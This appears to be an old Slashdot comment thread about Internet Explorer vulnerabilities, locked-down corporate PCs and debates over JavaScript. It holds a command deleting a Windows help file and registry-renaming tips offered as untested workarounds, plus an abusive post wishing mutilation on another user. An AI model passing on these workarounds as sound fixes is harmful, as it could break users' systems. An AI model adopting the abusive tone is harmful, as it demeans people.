I'm a software developer at a very large company. Recently, the company underwent a reorganization. I now work for a different business unit. To make a long story short, this business unit does not give employees permission to install software on their desktop computers. They don't just prohibit it, they flat out prevent it via Windows administrator settings.
This means I have to use the corporation's approved; web browser: Internet Explorer. And, it means I can't even install Firefox or Opera to test my web designs.
Luckily, the team I work with is pushing the corporate bureaucracy to give us more rights to our machines. But I wonder how many people go through that effort, or how many of them succeed? Can policies like this - where the web developer can't even test their site in a non-IE browser - explain why some sites don't work in other browsers?
Not much too it. Note that no examination of the page was made for booby traps of any kind. Also a number of "#8271" were removed. The text claims it was generated by word press. spacerook uses apache on linux and is a lunarpages site.
Friends don't help friends install M$ junk.
What happens if you remove the IE help file, iexplore.chm?
Does this stop the exploit?
GED
Sod off, bonch-ly Critical Guy. You're the one who needs to get a life. Seriously.
Virus writers seem to agree.
The problem with the popularity argument (which has been thoroughly debunked, I might add) is that it assumes that Mozilla and IE are architected identically, which they most assuredly are not. IE was written with security an afterthought while Mozilla was written with security implications in mind. To say that replacing one with the other would somehow magically 'blow holes' into it is really making a statement about which you know nothing. I can't help but add a little dose of reality to this thread, since the MS shills are out in force.
Not a bad start.
We don't let them even see their C: drive, either (amongst other restrictions). Draconian? Yes, but it's the only sane approach for a corporate network. With what we give them, they can accomplish everything they need to get their job done.
Sane? I have my doubts When free OS exist that require far less effort on your part? What exactly do your users need to get their job done? How do you know? Do you realize that by doing all of that you have eliminated almost all of the reasons to run windoze in the first place? Why pay for something you don't want to use? I'd rather have a KDE desktop that I can plug my camera and PDA into. You must have some nasty DOS thing holding you back.
Friends don't help friends install M$ junk.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
For some reason I find the banner ad for visualstudio.net across the top of this story quite amusing...
Looks like that context sensitive ad engine is working!
"Smile, listen, agree, and then do whatever the fuck you wanted to do anyway." ~Robert Downey Jr.
This is very useful, especially since these days flash is mostly used for ads. When you go to a site when you actually want to view the flash animations, just click on the button.
I have a locked down workstation at work, but luckily i can still use a tabbed broswer! Firefox has an installation free release of firefox. You can simply unzip it to a folder on your computer or even network storage and run it from the single .exe. No installation required!
WURD!!
Better than mother's milk? How about a sharp stick in the eye? A bed of nails?
Preferring IE over a modern tabbed browser with advert and pop up blocking or on the fly spell checking, right. Astroturf indeed. I hate the "I love IE" trolls.
Tell Bill Gates to send money to Slashdot when he wants to advertise here.
Friends don't help friends install M$ junk.
Another clot! Since when does /. allow javascript postings? Like I said - not true. (read it before replying next time eh?)
I can't reat you insensitive clot!
It is easier to build strong children than to repair broken men. -Frederick Douglass
But let me supply a counter-example.
I designed myself my own "portal" if you will, for my desktop. A few other people use it too. It presents a matrix of various input forms, each labeled with an icon that represents what it will be used for. From there, I can launch LDAP lookups in our directory, check property, search a dicitionary, search google, use our intranet search, etc. etc. All from a very spartan, quick loading interface.
The form is automated with javascript. It's sensitive to mouse-over... it displays the type of search in the status bar to remind you if the icon is not informative. And if you roll over the form, the "Google" search area steals the input focus so you can just start typing (used most frequently). But if you click in a specific search box, Google won't steal the focus anymore. Hitting enter launches a input-box specific function that crafts an appropriate GET request using the text in the box, and "submits" it using the enclosing form.
If you can think of a better way to present such a page with straight XHTML and CSS... I'd like to hear it. And it is indispensible... I spend a lot of time opening up new windows to that screen.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
This link was obtained in a straight forward way with Firefox 0.8.
>As usual, the primary workaround is to disable Active Scripting for any sites that aren't Trusted, but you should have turned off that and Javascript years ago for safety anyway
If you bother writing that much, why don't you bother finding a link describing the procedure for mortals like me. That would take maybe a minute of time from people who knows already that much and would most likely generate a lot of good.
With stories like this, do you really have to ask?
Riiiight... Like how Apache has a larger market share than IIS, and it has way less security vulnerabilities.
I'm sure there's plenty more holes in IE left to be found, and many more will be created when other crap is stacked on top of it and leveraged by the operating system.
A good thing is healthy competition, and good open source alternatives should make Microsoft improve the quality of their products to compete; we have just started to see that.
grep -iw skynet
Same here... running a unpatched Windows 2000 box for one incredible long month now without any patches...
The best firewall is a solid hardware firewall consisting of a unplugged network cable!
People keep blaming MS for this mess. It's not MS, it's the coders at i-lookup.com.
Look, it's like this: let's say I buy a new F-150, then I drive it around, and eventually it gets carjacked (with me in it) and the guy with the gun has me run over your grandma.
Do we place the blame with Ford on this? Nope. We blame the fool who didn't lock the door (me), and the guy with the gun.
MS can only do so much without people complaining about not being able to do things they want. Javascript and ActiveX aren't "broken," they're being used incorrectly by criminally minded folks. Just like in my example above, it's not the Ford to blame, but the driver and the hijacker for using tools in an incorrect manner.
So, let's all place the blame squarely where it belongs: on the malware coder and the moron user that follows any random link sent to them.
Does the pope wear a funny hat?
What a load of rubbish. You're right about Active Scripting, but there's nothing wrong with Javascript, and sensible use of Javascript makes the whole web more responsive.
For example, when you fill in a form, local Javascript should validate the entries whenever possible. This gives much quicker feedback to the user because it avoids a round-trip to the server (and it reduces the load on the server as well). We need more sites doing this, not fewer.
(Of course, all validation has to be repeated on the server, but "pre"-validation is still a huge time-saver, bandwidth-saver, and server-load-saver).
Would it be possible to create a web browser than runs as a java applet within IE? I'm thinking...port Mozilla to Java....create an applet. Then Let people with IE only systems go to the applet page and execute the Mozilla Java application and BAM! They're running Mozilla (or some browser) without installing it.
Any thoughts?
In the same way that a cigarette is a "nicotine delivery agent."
I saw that shot more than a few times back when Starbuck was a man. ~ lucabrasi999
At the risk of starting a flame war, allow me to point out that I posted a link to a site with a proof-of-concept showing that clipboard data can be retrieved using JavaScript. It is true, it does work, in IE (although it can be disabled). Before you flame someone for "not reading before replying", I suggest you take your own advice.
Can you picture it? It's called Stephen King's Maximum Overdrive. Off topic but hey, it's kinda funny.
I've spent a few years developing enterprise software myself. Enterprise software purchacing processes too often end up being fine examples of what goes wrong in the Principal Agent Problem. Specificly, that those who have the authority to make the purchasing decision are not accountable (or accountable enough) to the interest of a group of stakeholders (clearly, IT/admin staff in this case). If they've used similar products and the admins can't show the impact of the lack of these fetures, cant' argue their way out of it, lack the veto power, and it meets the "good enough" requirement then system is purchased anyways. There's a lot of garbage out there with pretty UIs that need regular reboots.
*** Sigs are a stupid waste of bandwidth.
Reality? They rewrote software for Longhorn, so come 2007 we can start the whole security thing all over again! :-)
-Rob
Marriage doesn't have to suck!
Apple's fix seems to be much the same kind of whitewash as most of Microsoft's have been...
Another Open Letter to Apple
Note: Please make the distinction between IE the application and the IE engine.
The IE engine (a set of shared libraries) is part of windows the same way that GLIBC is part of most Linuxs.
Sure GLIBC is (mostly) in userland, but it has many hooks into the kernel (ex. syscalls).
The IE engine has more hooks, reaches deeper, and uses undocumented interfaces that are so insecure/unstable microsoft doesn't want you to know about them.
IE the application (a user level application) is mostly a frontend that accesses the IE engine via library calls in several DLLs.
(Note - I am quite the opposite of an MS fanboy (part of my job description is transitioning my department from Windows to Linux), but I find some of this difficult to understand.)
-----
I have had Windows boxes on which the antiviruses were updated twice daily - just to find that by the time I had received the update, the malicious software had already been on the machine.
-----
How did it get there? There are relatively few worms for Windows (though the effective ones such as Blaster and Sasser tend to be very widespread). Other forms of attack need some kind of user initiated vector, be it clicking in an e-mail, visiting a website (as with this discussion), doing something. Identify how it's getting in, and put an end to it.
-----
On a Windows box at home, despite antivirus software, Windows' builtin firewall and a 3rd party firewall software, I once counted 12 (!) different infections within less than 24 hours.
-----
What do you define as an infection? On my Windows box at home, I run no firewall other than the one built into my router, Symantec AV, regular Windows Updates, and I don't get infections.
-----
Interestingly enough, it's gotten much better for me at home since I've been running my Windows box through a Linux gateway. Still, stuff slips through, but it's on the order of one a week or so.
-----
Again, one of what? Sasser and Blaster bounced off my router firewall. The IIS and SQL worms didn't have a chance - even if they got through the firewall because I don't run unnecessary servers, and were I running SQL, it would be locked down to local machines via a firewall.
I get an e-mail virus every now and then in my inbox (most of them get caught by the industrial strength virus scanners that guard the mail servers I use). I don't get infected by not clicking on them. I use Mozilla, which doesn't have the malware targeting it. I don't install Kazaa or Morpheous, etc., that come loaded with junk.
Where are you having a problem? Windows isn't good, but it's nowhere near as bad as you make it out to be. Despite minimal Windows admin knowledge, I keep my home machine and a slew of work machines running just fine.
"Riiiight... Like how Apache has a larger market share than IIS, and it has way less security vulnerabilities."
Apache is not a tool for end users and neither is IIS. Therefore there it does not apply to my point. IIS is insecure because IT HAS LESS MARKET SHARE THAN APACHE. Do you see now? Probably not. You say that Apache has very few holes, well, that's because
a) Apache is more mature than IIS and more widespread and all those holes have been found and fixed in the same manner that the holes in the widespread IE browser are being found and fixed
b) YOU never get told about the holes or the holes are never found because open source projects don't get the press that end-user tools such as IE get.
The press report Microsoft security holes. Certain massive holes such as the OpenSSL hole that appeared a year or two ago don't get any generalized press because the public wouldn't understand them or the press don't understand them.
"I'm sure there's plenty more holes in IE left to be found, and many more will be created when other crap is stacked on top of it and leveraged by the operating system."
Probably not as many holes as are waiting to be found in non-dominant browsers such as Opera or Mozilla because they have not had the exposure to people looking for such holes as Internet Explorer has had. Plus, you have no logic or evidence to support your point, thus your point is void.
"A good thing is healthy competition, and good open source alternatives should make Microsoft improve the quality of their products to compete; we have just started to see that."
To compete with what? Microsoft are not worried by Linux on the desktop. On the desktop they're worried by Macs, and always have been. The whole Start menu was ripped right out of a Mac, in fact the majority of the Windows interface was. The KDE/Gnome interface? Well that was ripped out of Windows AND Macs. Sadly it's not the best of both worlds. Microsoft are worried about Linux/UNIX in business, which is where Microsoft gets its main source of revenue. This is why you only ever see ads for business products from Microsoft (especially on Open Source/Linux oriented sites -- hello Linux Today). In the desktop arena the only people Microsoft is currently competing with in real terms, real life, in the real fucking world where you buy your software off the shelf in WalMart is the crackers. It's not Linux or UNIX that is making Microsoft compete more in DESKTOP arenas, it's Macs, and it always has been.
Na... the best firewall is a physical wall that blocks the computer from every physical contact (including the network cable)
i'm running sp1 and many of these vulnerabilities' proof of concepts do not work.
Fuck IE
Listen to a A Tribe Called Quest less chance of been hacked
"The most dangerous creation of any society is that man who has nothing to lose." - James Baldwin, American author
"None of the ones in the IE list are."
They are on my machine. I'm running Windows XP SP2, and not a single one of those flaws work in my copy of IE.
XP SP2 is a whole different ballgame. Apparently, large parts of IE were rewritten to prevent such flaws from existing in the first place. Not to mention that every important OS component was recompiled with a new compiler which is designed to eliminate most buffer overrun possibilities. Not to mention the new firewall and a whole lot more.
For example, when you download a file, IE warns you when you start the download if it could pose a threat. Then, when you open the file for the first time (later on), Windows Explorer warns you that the file was from an unsafe source.
Windows now continually bugs you if you leave automatic updating or the firewall off, or if you don't have antivirus software installed (or if its reference file is not up to date).
The new firewall is on by default. All ports are blocked out of the box. File sharing is off by default.
Everyone wonders why Longhorn has been delayed. The reason is simple: Microsoft rolled most of the new security features in Longhorn into XP SP2. They are releasing what amounts to an entire new OS and they aren't even trying to charge for it.
Microsoft is taking security seriously. Remember when every Linux user laughed at the instability of Windows? It's time that the Linux community realizes that Microsoft isn't standing still. In a few years, they may very well have the most secure mainstream operating system. Microsoft knows that it cannot continue producing insecure software, just as they knew that the could not contiune producing unstable software.
Ok, first my usual disclaimer that this IS NOT a troll, there is an important point in this message, lets see if you 'get it' ...
....
... just so you can see how many websites out there do use Javascript.
... yet can't see the irony of your thinking. A few jerks abuse guns, but I'm sure many of you would scream if someone wanted you to lose the 'right' to use them.
.. although its just to put an ad banner at the top of the page.
Before you all go shutting yourself in a dark closet safe from the evils you see everywhere
Switch your browser to 'prompt' before allowing active scripting to run. Leave other things such as Java etc turned on, I just want to show you something about JavaScript without clouding the issue with the other technologies.
Nearly every website you go to has a little JavaScript in it! Do you really think they are all idiots, or can use see that there are good uses for it?
Have you taken the time to learn a little about what you can do with JavaScript to make your websites more user friendly (oh the horror! how dare anything be user friendly!)
Do you really believe that people ONLY use javascript to screw with you? That all the great things you can do quickly and easily with JavaScript are worthless because there are a few jerks out there that abuse it?
I bet there's a lot of you out there that are totally against javascript that are also totally opposed to gun control
Even our precious Slashdot uses Javascript!
There are good uses for JavaScript, that can add to the usefulness of a website, that are not just glitz.
Why not get angry at those that spend their time looking for unanticipated exploits, that would abuse the systems for once instead of shutting yourselves out, making yourselves victims of the javascript terrorists you see behind every corner?
George Bush + Linux = "I will not let information get in the way of the fight against Windows"
Damn right, Jim. Watch the process in win2K for example, when you switch from a local page of some kind to something on the net. explorer.exe grabs a bit more memory and continues running with the same PID. I don't know much about the internals of Win2K, but IMO IE and windows explorer are one and the same. I don't think we should infer too much from the different applications.
Because of the built-in nature of IE, it is in fact impossible to fully remove it from Windows 2K IME without breaking the OS. I suspect it is similar in XP also.
Real stupidity beats artificial intelligence every time.
-- Terry Pratchett, Hogfather
del C:\Windows\Help\iexplore.chm
IE just displays a "The page cannot be displayed" message now when I try the exploit links posted on SecurityFocus. Anyone else care to confirm?
They were all porn sites, heh heh. But I've had the ms-its protocl disabled for quite some time. :)
You should be able to do this by poking around in HKEY_CLASSES_ROOT\PROTOCOLS\Handler
Just rename everything you don't want to BAK-whatever. Outlook needs MHTML, FYI.
bonch (aka Overly Critical Guy)
WTF?! Overly Critical Guy is *MUCH* better than this bonch pussy!
Why does Microsoft keep developing software for Macintosh then? Which in my opinion is better quality software than the equivalents on their own platform. IE on the mac used to be the best browser around until they let that stagnate, I used to use it exclusively and loved it. In case you haven't checked recently, Linux actually occupies a larger market share than Mac OS does. I should know, I'm posting this right now from from a 4 year old Power Mac G4 which is happily running OS 10.3 (by the way lets see 4 year old PC hardware usefully run WindowsXP). Apple also just got a taste of Microsoft's medicine recently with all their URI exploits. That's what you get when you trust a web browser to interface with parts of the operating system.
I agree with that, many large holes are found in open source software all the time, they just don't get the same publicity as Microsoft's security holes do. Apple has also got a lot of publicity when holes were found in OS X.
I believe in using the best tool for the job, and IE is rarely the best tool for any job. If you use IE, you lose, it's plagued with spy-ware, and don't even try to tell me if other browsers were as prevalent as IE they would also end up with 5 different spy-ware search bars stacked on top of each other. The reason why is IE exposed to so much spy-ware is because of ActiveX, plain and simple, no other browsers by default download executables and invite them to run without even asking you!
I guess you don't have friends and family members constantly begging you to look at their NEW computer because it crashes constantly and acts so slow; first thing to do, install Mozilla Firebird, second, clean off all the spyware, third, install 40 different security patches, fourth, install anti-virus software.
With all the money and market share Microsoft has, they should be able to make better products than other people are MAKING FOR FREE ON THEIR SPARE TIME! They need to quit trying to be a jack of all trades and concentrate on a few things, and do them well.
You sound to me like a threatened Microsoft developer, out of touch with reality in the IT world, I personally am not a developer, I am a net admin, I don't put all my eggs in one basket, I have experience with lots of products. I use what my company forces me to use (*cough* Microsoft *cough*), and whenever I can, I use what I feel are the best tools for the job, which sometimes include Microsoft products. Don't be afraid of open source software, it keeps proprietary vendors on their toes, and can peacefully co-exist with proprietary software. Look at Apple, they have done a great job creating products with a mixed model of open source and proprietary software.
grep -iw skynet
Remember IE4? When it was released, the installer installed a new version of Windows Explorer, which had all these groovy (well, okay, mostly unbelievably stupid) features like the ability to turn your desktop into a webpage. I think it was at this point that the shared codebase came into play.
And herein lies the root of the problem. I think IE is now the base application for all of the UI of Windows. And well, since it's at its core an HTTP client, that means that any bugs in an insecure, non-encrypted client affect the whole OS.
Kinda like X-Windows, back in the bad old days before we had ssh. Oh well. Microsoft just recently built RPC support into their OS, too. You'd think they'd learn from all the *nix security holes of the '80s, but no, they seem committed to repeating them.
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
I'm pretty sure you're right, you know. Once you've got a program that can display stuff remotely via HTTP, it's pretty easy to divert its attention to local files and folders, and import all the bugs and vulnerabilities into the core of the GUI. Aaargh.
Also, notice that explorer.exe is always running. IIRC this began with windows 95, but my memory is a little fuzzy here. I was only 14 when it came out after all. Anyway, even without any my computer or whatnot windows up, explorer.exe retains about 2 meg of memory, which goes up about 3 meg when you open a local page and 6 or so for a remote one.
One of the parent posters suggested somewhat facetiously that every Windows application is some kind of plugin to IE. They may be closer to the truth than they realised!
Real stupidity beats artificial intelligence every time.
-- Terry Pratchett, Hogfather
Are a repititious, vacuous cretin. I am sick and tired of your puerile, irritating, immature drivel. I am not one for limiting people's rights of free speech but you should have your fingers cut off and your eyes, tongue and vocal chords removed for the good of /. and humanity as a whole.
I do use the TITLE attributes already. But, as you say, not all browsers are created equal. I'm using MSIE 5.5, 6.0, sometimes NS 4.7, and Moz (recent) on Windows, Linux and Solaris. So a little extra magic helps for consistency.
o o*)(descrip tion=*$foo*)) ...
I had forgotten about ACCESSKEY. I am pleseantly suprised that all the Windows and *nix based browsers respond equally well to ALT+key... I was worried about accelerator confusion.
Of course, a normal user wouldn't know about that feature (or what keys to press for different form parts). Maybe I'll add it next to the text description.
The last part, about the magic GET request, is necessary in that there is only one form, and therefore, one action. Moreover, the required search strings are often abuses of various Perl scripts which expects a POST request from a complex form, but also happen to accept a GET request. These GET requests require a multitude of search-specific fields to be passed in the query. Because they are search specific, I'd need multiple forms, with many hidden form elements. But even then, in many places I am forced to duplicate the input text fields' content... for example:
One field searches a property database. It amounts roughly to an LDAP search...
(|(hostname=*$foo*)(propertynumber=*$f
and the query string looks almost exactly like that, except URL escaped.
Note $foo repeated thrice? The javascript calls a function that takes a query string prototype and searches/replaces with the entered text. Any number of repeated references in a complex search expression can therefore be created. One would otherwise have to fill three text boxes with the same text. This is most easily accomplished with javascript, and cannot be done otherwise with a simple form.
Remember, I don't control the scripts. I just want to tie those resources together for myself and my coworkers.
Since all our browsers support javascript, and in IE it is enabled for at least our internal network, I feel I am using the right tool for the job.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON